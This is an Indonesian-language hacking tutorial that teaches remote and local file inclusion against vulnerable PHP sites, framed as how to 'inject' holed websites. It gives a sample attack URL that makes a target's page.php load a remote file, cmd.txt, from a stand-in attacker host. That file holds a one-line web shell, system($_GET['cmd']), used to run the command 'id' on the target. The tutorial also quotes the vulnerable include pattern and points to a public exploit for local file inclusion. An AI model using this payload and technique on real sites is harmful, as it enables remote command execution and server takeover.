Belajar Menyuntik situs yang memiliki lubang

Inject = Menyuntikkan

Dimana kita Menyuntikkan sebuah source code atau yang biasa di sebut evil code ke sebuah situs yang memiliki bug/kesalahan/lubang/hole pada aplikasi yang di gunakan.

Aplikasi yang di gunakan dapat berupa berextensi cgi ataupun php. yang paling banyak di dapatkan adalah halaman atau situs yang ber-lubang menggunakan type php.

ada beberapa sistem inject serta beberapa evil code yang digunakan.

inject yang biasa di gunakan :
RFI (Remote File Inclusion)
LFI (Local File Include)

Contoh Dari RFI

www.situs.yang.adalubangnya.la/page.php?page=http://tempat.evil.code.la/cmd.txt?&cmd=id

Penjelasan dari masing-masing di atas:

www.situs.yang.adalubangnya.la : adalah target yang memiliki bug/kesalahan/lubang/hole yang terdapat pada halaman page.php


page.php?page= : adalah bug atau lubang dari target itu, dimana isi dalam file page.php ada yang berisikan :
......
require_once($page.’/wp-config.php’);
.......


http://tempat.evil.code.la/cmd.txt?&cmd= : adalah evil code yang di gunakan untuk men-inject atau Menyuntikkan sebuah perintah atau beberapa perintah sekaligus kedalam server target atau komputer target. dimana isi cmd.txt :

system($_GET['cmd']);

id : adalah perintah yang akan di berikan untuk dijalankan oleh komputer target.


Untuk LFI dapat di lihat di : http://www.milw0rm.org/exploits/5057